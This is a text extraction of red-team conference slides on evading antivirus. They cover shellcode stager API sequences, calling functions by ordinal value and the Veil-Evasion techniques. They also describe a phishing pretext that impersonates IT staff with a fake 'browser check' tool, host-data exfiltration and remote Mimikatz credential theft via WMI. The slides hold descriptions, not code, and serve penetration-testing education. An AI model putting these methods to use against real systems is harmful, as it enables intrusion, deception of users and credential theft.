Post on 22-Jan-2017
A Battle Against the Industry - Beating
Antivirus for Meterpreter and More
@ChrisTruncer
Whoami■ A systems administrator turned red teamer■ Florida State Seminole■ Open Source Software Developer
■ Veil-Framework■ EyeWitness
Thanks Robin :)■ Egress-Assess■ Just-Metadata
Why am I here today?
■Share some laughs at Antivirus :)■Give a background on stagers■Showcase a Veil-Evasion signature bypass■Anyone can do this..
■Talk about developing your own code■Case studies on previously developed code
Stagers
What are stagers?
■Can be referred to as “stage 1”■Might be msfvenom, Veil-Evasion, etc. output
■Goal is typically to inject shellcode into memory■Shellcode usually downloads and executes a
reflectively injectable dll■…but it can also do anything you want if you
write it :)
What are stagers?
■Stagers are really used as loaders for your real malware■They’re designed to be expendable and tiny■Don’t give away your engineered malware by
dropping it to disk■Load everything in memory
What are stagers?
■Any language that has the ability to access windows functions can be used to write a stager!■Pretty cool, and allows us to expand out from
traditional “Windows Langauges”■Interacting with Windows functions can seem
daunting, but isn’t all that bad■4 or 5 function calls
Function Calls
Stagers in a Nutshell
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into
the process’s memory■ Wait for the thread to complete running before
exiting the program
Windows API Calls
■Most stagers utilize VirtualAlloc to allocate memory
■This talk shows an alternate way to allocate memory that isn’t heavily utilized
■It might be a better way to fly under the radar
HeapCreate
■Creates a private heap object that can be used by the process creating the heap■Specify the memory protections■Requires the size of the heap that will need to be
allocated■Shellcode length
■Max size of allocated memory■I do twice the shellcode length
HeapAlloc
■ Allocates memory from the previously created heap object
■ Receives a handle to the previously allocated heap object
■ Specify the total amount of space that you are allocating for shellcode
RtlMoveMemory
■Places the shellcode you are injecting into the allocated heap space
■Needs a pointer to where data (shellcode) will be copied to (heapalloc output)
■Needs a pointer to the data (shellcode)■Needs the length of the shellcode being injected
CreateThread
■This function creates a new thread within the current process to execute the data (shellcode) that was injected
■Requires a pointer to the data (shellcode) that will run in the new thread
■Schedule the thread to execute immediately
WaitForSingleObject
■This function is like a blocking call to prevent the program from exiting immediately
■Requires a handle to the thread that was created by the CreateThread function
■Requires a value (-1) to specify that the program should wait to exit until the thread exists
Stagers in a Nutshell (Repeated)
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into
the process’s memory■ Wait for the thread to complete running before
exiting the program
Ordinal Values
Ordinal Values
■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection
■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list
■Same concept for bypassing AV via ordinal values
Ordinal Values
■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?
■ This is still a call to the same function, but just via a different method
■Check out this code
Ordinal Values
■Simply referencing function calls by their ordinal value vs. name can bypass anti-virus
■NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.■So…. how do we find these ordinal values?
Ordinal Values
■PEView is a free program which lets you inspect PE files, dlls, etc.
■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value
■PEView provides the base 16 value, so be sure to convert it to its base 10 value.
Veil’s Approach
How Veil-Evasion Bypasses AV
■ Completely open sourced■ Can query VT’s API
■ Veil-Evasion attempts to bypass AV through a few different techniques
■Obfuscated Code
■Encrypted Code■Non-standard languages for binaries
Flat vs. encrypted code
How Veil-Evasion Bypasses AV
■ Languages that Veil-Evasion supports■Python
■Perl
■PowerShell■C#
■C
■Go■Ruby
How Veil-Evasion Bypasses AV
■Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus
■AV just didn’t understand how to properly inspect these executables
■Example:
■C Flat vs. Python Flat
Ordinal Values
■ Simply changing the language the payload was written in completely bypassed all AV signatures.
Antivirus Signature
Veil-Evasion
■After about 1 year, Veil-Evasion finally had its first signature!
■I was informed about this on IRC and wanted to check it out.
Custom Code
Browser Check Scenario
■Instead of sending just some random executable when phishing, what if you promise to secure their system?
■Developed by Hunter Hardman (@t3ntman)
■Written in C#■Custom code, so it bypasses every single AV out
there (at least before Hunter made it public :))
Browser Check Scenario
■This works great for phishing scenarios■We target individuals impersonating their IT
Security, or just IT staff■Warn them about the dangers of
misconfigured/old browsers■Give them a solution!
Browser Check Scenario
■Once the program starts, it spawns PowerShell and executes any code you give it
■Meterpreter or Beacon!■It’s fully functional, once user tells it to start,
they see a progress bar go to completion.■Once complete, it lets them know their system is
secure!
Browser Check Scenario
■Delivery is dependent upon the situation■We’ve created websites hosting it over HTTPS
to make users think it is secure■Created fake “secure file transfer” websites
■Rarely, we’ve sent just the executable
■For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program
Browser Check Scenario
■Currently available for review at -https://github.com/t3ntman/BrowserCheck
Enumerator
Enumerator
■Customer didn’t want actual shellcode injection of infection of their endpoints
■Wanted intel collection to act as proof of “compromise”
■I developed a script that would gather host information and would POST the data out over HTTPS to our server.
Enumerator
■Information gathered■System hostname
■IP address(es)
■System drives and drive space■Current user
■Tasklist
Github
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py
WMIOps
WMIOps
■Why waste engineering time, developing a RAT, hoping it never gets burnt. Just leverage built in functionality!
■Anything useful for system administration is just as easily repurposed for illegitimate use :)
■Just live off the land!
WMIOps
■Used WMI much?■WMI is installed and running by default on
Windows systems since Windows 2000■It does require local admin privileges on the
targeted systemBut this can make it great for post-
exploitation
WMIOps
■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.
■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks
WMIOps
■ Want to see which users have active processes on a system?
■Might be good to know where you can snag creds!
■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!
WMIOps
■Now that we know who is on the system, want to run Mimikatz to capture user credentials?
■Traditionally we’d have to compromise it, and load up Mimikatz.
■Why not leverage WMI to do everything in memory without needing the use of a RAT?
WMIOps
■ Invoke-RemoteScriptWithOutput■Spawn PowerShell on the remote system
■Download the PowerShell script in memory
■Runs the user specified function■Saves output
■Performs a POST over HTTPS to a user specified IP address
WMIOps
■ WMIOps can do other tasks as well■Run commands
■Kill processes
■Search for files■Transfer files
■Etc.
Available here -https://github.com/ChrisTruncer/WMIOps
Thanks!Any questions?
Reach out to me!■ @ChrisTruncer■ Chris@Christophertruncer.com■ https://www.christophertruncer.com■ https://www.github.com/ChrisTruncer